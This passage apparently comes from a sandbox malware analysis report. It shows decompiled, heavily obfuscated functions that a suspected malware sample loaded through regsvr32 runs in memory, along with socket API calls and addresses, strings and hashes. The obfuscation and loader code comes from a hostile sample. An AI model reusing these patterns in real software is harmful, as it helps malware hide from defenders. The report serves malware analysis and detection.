					 *((short*)(E04B409DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
					L04B3BAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
					_push(_v2620);
					_push(_v2764);
					_push(_v2652);
					E04B52D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0x4b3188c,  &_v2080,  &_v2600, E04B4E1F8(0x4b3188c, _v2736, _t501));
					E04B4FECB(_t434, _v2636, _v2720, _v2704, _v2728);
					_t448 = _v2616;
					_t420 = E04B3BFBE( &_v2080, _t488, _v2688);
					_t493 =  &(_t493[0x18]);
					if(_t420 != 0) {
						_t489 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t489 = 0x6430241;
				goto L7;
			}

0x04b47d5b
0x04b47d61
0x04b47d6a
0x04b47d71
0x04b47d78
0x04b47d7f
0x04b47d90
0x04b47d94
0x04b47d9a
0x04b47da1
0x04b47da6
0x04b47db1
0x04b47db2
0x04b47db6
0x04b47dbe
0x04b47dc9
0x04b47dd1
0x04b47ddc
0x04b47de4
0x04b47dec
0x04b47df4
0x04b47dfc
0x04b47e07
0x04b47e12
0x04b47e1d
0x04b47e28
0x04b47e30
0x04b47e3b
0x04b47e43
0x04b47e50
0x04b47e54
0x04b47e5c
0x04b47e64
0x04b47e6c
0x04b47e74
0x04b47e7c
0x04b47e84
0x04b47e8c
0x04b47e94
0x04b47e99
0x04b47ea1
0x04b47ea9
0x04b47eb4
0x04b47ebf
0x04b47eca
0x04b47ed5
0x04b47ee0
0x04b47eeb
0x04b47ef3
0x04b47efb
0x04b47f00
0x04b47f08
0x04b47f13
0x04b47f1e
0x04b47f29
0x04b47f31
0x04b47f36
0x04b47f44
0x04b47f48
0x04b47f50
0x04b47f5b
0x04b47f63
0x04b47f6e
0x04b47f76
0x04b47f83
0x04b47f87
0x04b47f8f
0x04b47f99
0x04b47fa4
0x04b47faf
0x04b47fba
0x04b47fc5
0x04b47fd0
0x04b47fdb
0x04b47fe6
0x04b47fef
0x04b47ff4
0x04b47ffd
0x04b48008
0x04b48010
0x04b48015
0x04b4801a
0x04b48022
0x04b4802d
0x04b48038
0x04b48043
0x04b4804f
0x04b48054
0x04b4805a
0x04b4805f
0x04b48067
0x04b4806f
0x04b48074
0x04b4807c
0x04b48084
0x04b4808c
0x04b48094
0x04b48098
0x04b480a0
0x04b480ab
0x04b480b6
0x04b480c1
0x04b480c9
0x04b480d5
0x04b480da
0x04b480e0
0x04b480e8
0x04b480f0
0x04b480fd
0x04b480fe
0x04b48102
0x04b4810a
0x04b48115
0x04b48120
0x04b4812b
0x04b48136
0x04b48141
0x04b4814c
0x04b48154
0x04b4815c
0x04b48161
0x04b48169
0x04b48171
0x04b4817c
0x04b48187
0x04b48192
0x04b4819a
0x04b481a7
0x04b481b1
0x04b481b5
0x04b481bd
0x04b481c7
0x04b481d4
0x04b481e1
0x04b481e9
0x04b481f1
0x04b481fd
0x04b481fe
0x04b48202
0x04b4820a
0x04b48212
0x04b4821a
0x04b4821f
0x04b48227
0x04b4822f
0x04b48237
0x04b4823c
0x04b48244
0x04b4824c
0x04b48254
0x04b4825c
0x04b48264
0x04b4826c
0x04b48277
0x04b4827f
0x04b4828a
0x04b48292
0x04b4829a
0x04b482a2
0x04b482aa
0x04b482b5
0x04b482c0
0x04b482cb
0x04b482d6
0x04b482e1
0x04b482ec
0x04b482f7
0x04b482ff
0x04b4830a
0x04b48312
0x04b48317
0x04b4831f
0x04b48327
0x04b4832f
0x04b48337
0x04b4833c
0x04b48344
0x04b48357
0x04b4835e
0x04b48369
0x04b48371
0x04b48379
0x04b4837e
0x04b48386
0x04b48393
0x04b48397
0x04b4839f
0x04b483a4
0x04b483ac
0x04b483b8
0x04b483ba
0x04b483be
0x04b483c6
0x04b483ce
0x04b483d6
0x04b483e4
0x04b48546
0x04b4854b
0x04b48554
0x04b48558
0x04b485a1
0x04b485c1
0x04b485d0
0x00000000
0x04b485f1
0x04b483ea
0x04b483ec
0x04b4850a
0x04b4850a
0x04b48510
0x00000000
0x00000000
0x00000000
0x00000000
0x04b485fe
0x04b485fe
0x04b485fe
0x04b48409
0x04b4842e
0x04b48452
0x04b48457
0x04b48463
0x04b48467
0x04b484b6
0x04b484d6
0x04b484e2
0x04b484f1
0x04b484f6
0x04b484fb
0x04b48501
0x00000000
0x04b48501
0x00000000
0x04b484fb
0x04b48508
0x00000000

Strings

Gqx, xrefs: 04B47E64
O"r, xrefs: 04B48067
jz, xrefs: 04B47FE6
)p?M, xrefs: 04B48317
\f%0, xrefs: 04B47DD1
^xZ, xrefs: 04B4817C
o, xrefs: 04B47F00
>}#, xrefs: 04B48369
$P, xrefs: 04B47D8E
}0, xrefs: 04B47FAF

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
API String ID: 0-1313373530
Opcode ID: 18e9f4ebe8498e32bf635a05895541fdefa5bb7c18afe30a15e774da5da3cfd6
Instruction ID: e431779c33b060180e1fd997924d714fb5576b97f10b9566dfdae4b9c7651ac8
Opcode Fuzzy Hash: 18e9f4ebe8498e32bf635a05895541fdefa5bb7c18afe30a15e774da5da3cfd6
Instruction Fuzzy Hash: 2B12F2B15093809FD3A8CF21C949A9BFBE2FBC4708F108A1DE1D996260D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 04B3C6B8, Relevance: 11.7, Strings: 9, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B3C6B8() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t478;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t486;
				signed int _t494;
				intOrPtr* _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				void* _t513;
				void* _t522;
				void* _t562;
				signed int _t564;
				signed int* _t568;

				_t568 =  &_v1764;
				_v1588 = 0x57daab;
				_v1588 = _v1588 + 0x535a;
				_v1588 = _v1588 ^ 0x00582e2c;
				_v1756 = 0x11011b;
				_v1756 = _v1756 | 0x986fcb94;
				_v1756 = _v1756 + 0xffff0812;
				_v1756 = _v1756 | 0x2bc6aa33;
				_v1756 = _v1756 ^ 0x3bfefbb2;
				_v1652 = 0x5adeab;
				_v1652 = _v1652 + 0xffff93f0;
				_v1652 = _v1652 ^ 0xbf2e951e;
				_v1652 = _v1652 ^ 0xbf74e787;
				_v1668 = 0x1eca4f;
				_v1668 = _v1668 + 0x52c;
				_v1568 = 0;
				_v1668 = _v1668 * 0xb;
				_t562 = 0xbc1c7ad;
				_v1668 = _v1668 ^ 0x0152ea48;
				_v1584 = 0x89d737;
				_v1584 = _v1584 + 0xffff9374;
				_v1584 = _v1584 ^ 0x0082a8e0;
				_v1672 = 0x7da8ac;
				_v1672 = _v1672 >> 0xf;
				_v1672 = _v1672 | 0x438c492a;
				_v1672 = _v1672 ^ 0x438e7d89;
				_v1636 = 0xa2c3bd;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x051ae408;
				_v1720 = 0x328717;
				_v1720 = _v1720 << 0xc;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x9e9a;
				_v1720 = _v1720 ^ 0x2e0b4663;
				_v1760 = 0x4b7b55;
				_t57 =  &_v1760; // 0x4b7b55
				_t504 = 0x6f;
				_v1760 =  *_t57 / _t504;
				_v1760 = _v1760 >> 0xb;
				_t505 = 0x66;
				_t564 = 6;
				_v1760 = _v1760 * 0x46;
				_v1760 = _v1760 ^ 0x00015e15;
				_v1740 = 0xf42b27;
				_v1740 = _v1740 / _t505;
				_t506 = 0x21;
				_v1740 = _v1740 * 0x3b;
				_v1740 = _v1740 / _t564;
				_v1740 = _v1740 ^ 0x00118050;
				_v1680 = 0x69fb04;
				_v1680 = _v1680 / _t506;
				_v1680 = _v1680 + 0x2a45;
				_v1680 = _v1680 ^ 0x000477f2;
				_v1624 = 0xeefab1;
				_v1624 = _v1624 << 0xb;
				_v1624 = _v1624 ^ 0x77d908fd;
				_v1688 = 0x983026;
				_v1688 = _v1688 ^ 0xf9038374;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xf3384871;
				_v1656 = 0xbd9fd7;
				_v1656 = _v1656 | 0x34570662;
				_v1656 = _v1656 << 0xf;
				_v1656 = _v1656 ^ 0xcff19553;
				_v1724 = 0xb73e9;
				_v1724 = _v1724 + 0xffff2aba;
				_t507 = 0x1b;
				_v1724 = _v1724 * 0x2b;
				_v1724 = _v1724 + 0xffffc5c3;
				_v1724 = _v1724 ^ 0x01cec31d;
				_v1732 = 0xfb07a0;
				_v1732 = _v1732 + 0xfffff0a2;
				_v1732 = _v1732 ^ 0xe8e4881c;
				_v1732 = _v1732 + 0xfffffa8c;
				_v1732 = _v1732 ^ 0xe819b6c9;
				_v1664 = 0x98c4f6;
				_v1664 = _v1664 / _t507;
				_v1664 = _v1664 + 0xffffc9a9;
				_v1664 = _v1664 ^ 0x000722b9;
				_v1704 = 0x7b43f4;
				_v1704 = _v1704 + 0x33bf;
				_v1704 = _v1704 ^ 0xbdcd0236;
				_v1704 = _v1704 ^ 0xbdbcc173;
				_v1600 = 0x907d1c;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x000f3001;
				_v1608 = 0x549b29;
				_v1608 = _v1608 + 0xffff560f;
				_v1608 = _v1608 ^ 0x005a0ce7;
				_v1648 = 0x53669a;
				_t508 = 0x60;
				_v1648 = _v1648 * 0x53;
				_v1648 = _v1648 * 0x2d;
				_v1648 = _v1648 ^ 0xc0c27601;
				_v1616 = 0xf6b3f;
				_v1616 = _v1616 << 0xf;
				_v1616 = _v1616 ^ 0xb591763f;
				_v1712 = 0xd11a2f;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 + 0x34a7;
				_v1712 = _v1712 + 0xffffa6d8;
				_v1712 = _v1712 ^ 0x001715b5;
				_v1744 = 0x782a81;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 >> 3;
				_v1744 = _v1744 * 0x57;
				_v1744 = _v1744 ^ 0x00239f7e;
				_v1728 = 0xdf27c0;
				_v1728 = _v1728 + 0xb655;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 | 0x1084c50a;
				_v1728 = _v1728 ^ 0x10890bcf;
				_v1612 = 0xd31e5c;
				_v1612 = _v1612 / _t508;
				_v1612 = _v1612 ^ 0x000f28c0;
				_v1640 = 0xad59ab;
				_v1640 = _v1640 ^ 0x540bc483;
				_v1640 = _v1640 ^ 0x54aa6eab;
				_v1596 = 0xfc600e;
				_v1596 = _v1596 << 1;
				_v1596 = _v1596 ^ 0x01f16920;
				_v1676 = 0x70f7b6;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 | 0x834faa8e;
				_v1676 = _v1676 ^ 0x837cfefc;
				_v1580 = 0xc67f49;
				_v1580 = _v1580 ^ 0x220388f4;
				_v1580 = _v1580 ^ 0x22cc2a29;
				_v1604 = 0xf53a42;
				_v1604 = _v1604 + 0x1d20;
				_v1604 = _v1604 ^ 0x00fba671;
				_v1764 = 0x3c20a1;
				_v1764 = _v1764 << 0xa;
				_v1764 = _v1764 | 0xcc5879dc;
				_v1764 = _v1764 + 0x7d87;
				_v1764 = _v1764 ^ 0xfcd01767;
				_v1736 = 0xfcd131;
				_v1736 = _v1736 | 0xb098ccc9;
				_v1736 = _v1736 + 0x1f04;
				_v1736 = _v1736 | 0xe0e1c446;
				_v1736 = _v1736 ^ 0xf0fbfa39;
				_v1684 = 0x6ca78a;
				_v1684 = _v1684 >> 0xd;
				_t509 = 0x5d;
				_v1684 = _v1684 / _t509;
				_v1684 = _v1684 ^ 0x00062aae;
				_v1576 = 0x28ea20;
				_t510 = 0x2d;
				_v1576 = _v1576 / _t510;
				_v1576 = _v1576 ^ 0x000e137d;
				_v1632 = 0x34444a;
				_v1632 = _v1632 + 0xb7da;
				_v1632 = _v1632 ^ 0x00330b1f;
				_v1748 = 0x707d69;
				_v1748 = _v1748 << 0xb;
				_v1748 = _v1748 ^ 0xb1536161;
				_v1748 = _v1748 + 0xffff04ff;
				_v1748 = _v1748 ^ 0x32b99598;
				_v1696 = 0x3e2d26;
				_v1696 = _v1696 + 0x9f8b;
				_v1696 = _v1696 + 0xf840;
				_v1696 = _v1696 ^ 0x00305f5f;
				_v1700 = 0x43ad40;
				_t511 = 0x7e;
				_v1700 = _v1700 / _t511;
				_v1700 = _v1700 + 0x17b0;
				_v1700 = _v1700 ^ 0x000023e6;
				_v1628 = 0x615af9;
				_v1628 = _v1628 | 0xc5f525fd;
				_v1628 = _v1628 ^ 0xc5f01915;
				_v1752 = 0xf7a5b1;
				_v1752 = _v1752 | 0xfe49737c;
				_v1752 = _v1752 + 0x9fc0;
				_v1752 = _v1752 ^ 0x9fa1c746;
				_v1752 = _v1752 ^ 0x60a54bb7;
				_v1572 = 0x7bbdbf;
				_t512 = 0xe;
				_v1572 = _v1572 * 0x2d;
				_v1572 = _v1572 ^ 0x15c0521a;
				_v1620 = 0xd84802;
				_v1620 = _v1620 ^ 0x3749a239;
				_v1620 = _v1620 ^ 0x37909643;
				_v1644 = 0xebc394;
				_v1644 = _v1644 << 8;
				_v1644 = _v1644 ^ 0xebca8902;
				_v1692 = 0x3d115c;
				_v1692 = _v1692 ^ 0xaeae6a77;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 ^ 0x000f7307;
				_v1660 = 0x8a3dcc;
				_v1660 = _v1660 ^ 0x1263d9af;
				_v1660 = _v1660 / _t512;
				_v1660 = _v1660 ^ 0x015f4699;
				_v1592 = 0x64d88c;
				_v1592 = _v1592 ^ 0xc97cb881;
				_v1592 = _v1592 ^ 0xc91c2e76;
				_v1708 = 0x9c1e71;
				_v1708 = _v1708 ^ 0xd16e05af;
				_v1708 = _v1708 | 0x50445732;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x3ec99884;
				_v1716 = 0xd3e518;
				_v1716 = _v1716 + 0xffff72ee;
				_t501 = _v1568;
				_v1716 = _v1716 / _t564;
				_v1716 = _v1716 << 0xa;
				_v1716 = _v1716 ^ 0x8cea7ffc;
				while(1) {
					L1:
					_t513 = 0x5c;
					while(1) {
						L2:
						_t478 = 0x5243326;
						do {
							L3:
							if(_t562 == 0x22d4857) {
								_push(_v1688);
								_push(_v1624);
								_push(_v1680);
								_t479 = E04B4E1F8(0x4b31030, _v1740, __eflags);
								E04B37078( &_v520, __eflags);
								_t482 =  *0x4b56214; // 0x0
								_t486 =  *0x4b56214; // 0x0
								__eflags = _t486 + 0x34;
								L04B3F96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
								E04B4FECB(_t479, _v1600, _v1608, _v1648, _v1616);
								_t568 =  &(_t568[0x10]);
								_t562 = 0x6f5d8c5;
								goto L19;
							} else {
								if(_t562 == 0x3a11f46) {
									_push(_v1612);
									_push(_v1728);
									_push(_v1744);
									__eflags = E04B32DEA(_v1640,  &_v1564, _v1596, 0x4b310a0, _v1756, _v1676, 0x4b310a0, 0x4b310a0, _v1580, _v1604, 0x4b310a0, 0x4b310a0, _v1652, _v1764, _v1736, _v1684, _v1576, E04B4E1F8(0x4b310a0, _v1712, __eflags));
									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
									E04B4FECB(_t490, _v1632, _v1748, _v1696, _v1700);
									_t568 =  &(_t568[0x16]);
									L19:
									_t478 = 0x5243326;
									_t513 = 0x5c;
									goto L20;
								} else {
									if(_t562 == _t478) {
										_t494 = E04B400C5( &_v1560, _v1628, _v1752);
										_pop(_t522);
										_t497 = E04B42CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
										_t568 =  &(_t568[9]);
										__eflags = _t497;
										_t562 = 0xcd5a5d6;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t562 == 0x6f5d8c5) {
											_t502 =  *0x4b56214; // 0x0
											_t503 = _t502 + 0x23c;
											while(1) {
												__eflags =  *_t503 - _t513;
												if(__eflags == 0) {
													break;
												}
												_t503 = _t503 + 2;
												__eflags = _t503;
											}
											_t501 = _t503 + 2;
											_t562 = 0x3a11f46;
											goto L2;
										} else {
											if(_t562 == 0xbc1c7ad) {
												E04B31A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
												_t568 =  &(_t568[8]);
												_t562 = 0x22d4857;
												while(1) {
													L1:
													_t513 = 0x5c;
													L2:
													_t478 = 0x5243326;
													goto L3;
												}
											} else {
												if(_t562 != 0xcd5a5d6) {
													goto L20;
												} else {
													L04B353D0(_v1592, _v1708, _v1716, _v1564);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1568;
							L20:
							__eflags = _t562 - 0xbc3e7f;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x04b3c6b8
0x04b3c6be
0x04b3c6cb
0x04b3c6d8
0x04b3c6e3
0x04b3c6eb
0x04b3c6f3
0x04b3c6fb
0x04b3c703
0x04b3c70b
0x04b3c713
0x04b3c71b
0x04b3c723
0x04b3c72b
0x04b3c733
0x04b3c73b
0x04b3c74b
0x04b3c74f
0x04b3c754
0x04b3c75c
0x04b3c767
0x04b3c772
0x04b3c77d
0x04b3c785
0x04b3c78a
0x04b3c792
0x04b3c79a
0x04b3c7a5
0x04b3c7ad
0x04b3c7b8
0x04b3c7c0
0x04b3c7c5
0x04b3c7ca
0x04b3c7d2
0x04b3c7da
0x04b3c7e2
0x04b3c7e8
0x04b3c7ed
0x04b3c7f3
0x04b3c7fd
0x04b3c800
0x04b3c803
0x04b3c807
0x04b3c80f
0x04b3c81f
0x04b3c828
0x04b3c829
0x04b3c835
0x04b3c839
0x04b3c841
0x04b3c84f
0x04b3c853
0x04b3c85b
0x04b3c863
0x04b3c86e
0x04b3c876
0x04b3c881
0x04b3c889
0x04b3c891
0x04b3c895
0x04b3c89f
0x04b3c8a7
0x04b3c8af
0x04b3c8b4
0x04b3c8bc
0x04b3c8c4
0x04b3c8d3
0x04b3c8d6
0x04b3c8da
0x04b3c8e2
0x04b3c8ea
0x04b3c8f2
0x04b3c8fa
0x04b3c902
0x04b3c90a
0x04b3c912
0x04b3c922
0x04b3c926
0x04b3c92e
0x04b3c936
0x04b3c93e
0x04b3c946
0x04b3c94e
0x04b3c956
0x04b3c961
0x04b3c969
0x04b3c974
0x04b3c97f
0x04b3c98a
0x04b3c995
0x04b3c9a8
0x04b3c9a9
0x04b3c9b8
0x04b3c9bf
0x04b3c9ca
0x04b3c9d5
0x04b3c9dd
0x04b3c9e8
0x04b3c9f0
0x04b3c9f5
0x04b3c9fd
0x04b3ca05
0x04b3ca0d
0x04b3ca15
0x04b3ca1a
0x04b3ca24
0x04b3ca28
0x04b3ca30
0x04b3ca38
0x04b3ca40
0x04b3ca45
0x04b3ca4d
0x04b3ca55
0x04b3ca69
0x04b3ca70
0x04b3ca7b
0x04b3ca86
0x04b3ca91
0x04b3ca9c
0x04b3caa7
0x04b3caae
0x04b3cab9
0x04b3cac1
0x04b3cac5
0x04b3cacd
0x04b3cad5
0x04b3cae0
0x04b3caeb
0x04b3caf6
0x04b3cb03
0x04b3cb0e
0x04b3cb19
0x04b3cb21
0x04b3cb26
0x04b3cb2e
0x04b3cb36
0x04b3cb3e
0x04b3cb46
0x04b3cb4e
0x04b3cb56
0x04b3cb5e
0x04b3cb66
0x04b3cb6e
0x04b3cb79
0x04b3cb7e
0x04b3cb84
0x04b3cb8c
0x04b3cb9e
0x04b3cba3
0x04b3cbac
0x04b3cbb7
0x04b3cbc2
0x04b3cbcd
0x04b3cbd8
0x04b3cbe0
0x04b3cbe5
0x04b3cbed
0x04b3cbf5
0x04b3cbfd
0x04b3cc05
0x04b3cc0d
0x04b3cc15
0x04b3cc1d
0x04b3cc29
0x04b3cc2e
0x04b3cc34
0x04b3cc3c
0x04b3cc44
0x04b3cc4f
0x04b3cc5a
0x04b3cc65
0x04b3cc6d
0x04b3cc75
0x04b3cc7d
0x04b3cc85
0x04b3cc8d
0x04b3cca0
0x04b3cca1
0x04b3cca8
0x04b3ccb3
0x04b3ccbe
0x04b3ccc9
0x04b3ccd4
0x04b3ccdf
0x04b3cce7
0x04b3ccf2
0x04b3ccfa
0x04b3cd02
0x04b3cd07
0x04b3cd0f
0x04b3cd17
0x04b3cd25
0x04b3cd29
0x04b3cd33
0x04b3cd43
0x04b3cd4e
0x04b3cd59
0x04b3cd61
0x04b3cd69
0x04b3cd71
0x04b3cd76
0x04b3cd7e
0x04b3cd86
0x04b3cd94
0x04b3cd9b
0x04b3cd9f
0x04b3cda4
0x04b3cdac
0x04b3cdac
0x04b3cdae
0x04b3cdaf
0x04b3cdaf
0x04b3cdaf
0x04b3cdb4
0x04b3cdb4
0x04b3cdba
0x04b3cfa1
0x04b3cfaa
0x04b3cfb1
0x04b3cfb9
0x04b3cfc7
0x04b3cfe8
0x04b3d00e
0x04b3d013
0x04b3d018
0x04b3d03b
0x04b3d040
0x04b3d043
0x00000000
0x04b3cdc0
0x04b3cdc2
0x04b3cef5
0x04b3cf01
0x04b3cf05
0x04b3cf71
0x04b3cf91
0x04b3cf94
0x04b3cf99
0x04b3d048
0x04b3d04a
0x04b3d04f
0x00000000
0x04b3cdc8
0x04b3cdca
0x04b3ce91
0x04b3ce96
0x04b3ced5
0x04b3cedc
0x04b3cedf
0x04b3cee1
0x04b3cee9
0x00000000
0x04b3cdd0
0x04b3cdd6
0x04b3ce5f
0x04b3ce65
0x04b3ce70
0x04b3ce70
0x04b3ce73
0x00000000
0x00000000
0x04b3ce6d
0x04b3ce6d
0x04b3ce6d
0x04b3ce75
0x04b3ce78
0x00000000
0x04b3cddc
0x04b3cde2
0x04b3ce4d
0x04b3ce52
0x04b3ce55
0x04b3cdac
0x04b3cdac
0x04b3cdae
0x04b3cdaf
0x04b3cdaf
0x00000000
0x04b3cdaf
0x04b3cde4
0x04b3cdea
0x00000000
0x04b3cdf0
0x04b3ce06
0x04b3ce0c
0x04b3cdea
0x04b3cde2
0x04b3cdd6
0x04b3cdca
0x04b3cdc2
0x04b3ce0d
0x04b3ce1e
0x04b3d050
0x04b3d050
0x04b3d050
0x00000000
0x04b3d05c
0x04b3cdaf

Strings

2WDP, xrefs: 04B3CD69
(, xrefs: 04B3CB8C
U{K, xrefs: 04B3C7E2
E*, xrefs: 04B3C853
JD4, xrefs: 04B3CBB7
i}p, xrefs: 04B3CBD8
,.X, xrefs: 04B3C6D8
#, xrefs: 04B3CC3C
__0, xrefs: 04B3CC15

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
API String ID: 0-2449995950
Opcode ID: 61a82975aaee6ea592c8035ac57396d2ee1f103c964e593f3805628e016f9499
Instruction ID: f5cdeadc98206ad0d3d5441e2f98f0162017bde6d82f07146df22d1f67f9a5d9
Opcode Fuzzy Hash: 61a82975aaee6ea592c8035ac57396d2ee1f103c964e593f3805628e016f9499
Instruction Fuzzy Hash: E622317250C3809FD3A8CF65C58AA8BBBF2FBC4358F10891DE19996260D7B59949DF03

Uniqueness

Uniqueness Score: -1.00%

Function 100011C0, Relevance: 10.6, APIs: 7, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 100011F1
_memset.LIBCMT ref: 10001205
htonl.WS2_32(00000000), ref: 1000121B
htons.WS2_32(?), ref: 1000122F
socket.WS2_32(00000002,00000002,00000000), ref: 10001245
bind.WS2_32(?,?,00000010), ref: 1000126A
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51

Uniqueness

Uniqueness Score: -1.00%

Function 04B536AA, Relevance: 10.4, Strings: 8, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04B536AA() {
				signed int _t373;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				intOrPtr _t383;
				signed int _t385;
				signed int _t387;
				void* _t392;
				signed int _t435;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t449;
				signed int* _t453;

				 *_t453 = 0x507140;
				_t392 = 0xe12044f;
				_t453[4] =  *_t453 * 0x71;
				_t438 = 0x6b;
				_t453[5] = _t453[4] / _t438;
				_t453[5] = _t453[5] >> 9;
				_t453[5] = _t453[5] ^ 0x00002a7b;
				_t453[9] = 0x87b94d;
				_t453[9] = _t453[9] + 0xffff92a0;
				_t453[9] = _t453[9] + 0x79ac;
				_t453[9] = _t453[9] >> 3;
				_t453[9] = _t453[9] ^ 0x0010f8b2;
				_t453[0x18] = 0x43735f;
				_t453[0x18] = _t453[0x18] << 0xa;
				_t453[0x18] = _t453[0x18] + 0xffff408e;
				_t453[0x18] = _t453[0x18] ^ 0x0dccbc8d;
				_t453[0x19] = 0x2e99ff;
				_t439 = 0x48;
				_t453[0x19] = _t453[0x19] / _t439;
				_t453[0x19] = _t453[0x19] | 0xc1c83132;
				_t453[0x19] = _t453[0x19] ^ 0xc1c60879;
				_t453[0xc] = 0xdcf188;
				_t440 = 0x21;
				_t453[0x2b] = _t453[0x2b] & 0x00000000;
				_t453[0xc] = _t453[0xc] * 0x48;
				_t453[0xc] = _t453[0xc] + 0xb8d0;
				_t453[0xc] = _t453[0xc] + 0xe79e;
				_t453[0xc] = _t453[0xc] ^ 0x3e220605;
				_t453[0x1f] = 0x3f10b8;
				_t453[0x1f] = _t453[0x1f] | 0x536a71f8;
				_t453[0x1f] = _t453[0x1f] ^ 0x537d907f;
				_t453[0x17] = 0xda4ece;
				_t453[0x17] = _t453[0x17] / _t440;
				_t453[0x17] = _t453[0x17] + 0xffff6c3f;
				_t453[0x17] = _t453[0x17] ^ 0x000916d6;
				_t453[0x21] = 0x81e16;
				_t441 = 0x1f;
				_t453[0x20] = _t453[0x21] * 0x37;
				_t453[0x20] = _t453[0x20] ^ 0x01bbd9e8;
				_t453[0x12] = 0x23ff7a;
				_t453[0x12] = _t453[0x12] + 0xda88;
				_t453[0x12] = _t453[0x12] << 9;
				_t453[0x12] = _t453[0x12] ^ 0x49b967a0;
				_t453[0x25] = 0xa4ae1d;
				_t453[0x25] = _t453[0x25] + 0xffff1e93;
				_t453[0x25] = _t453[0x25] ^ 0x00a3b794;
				_t453[0x1a] = 0xc58380;
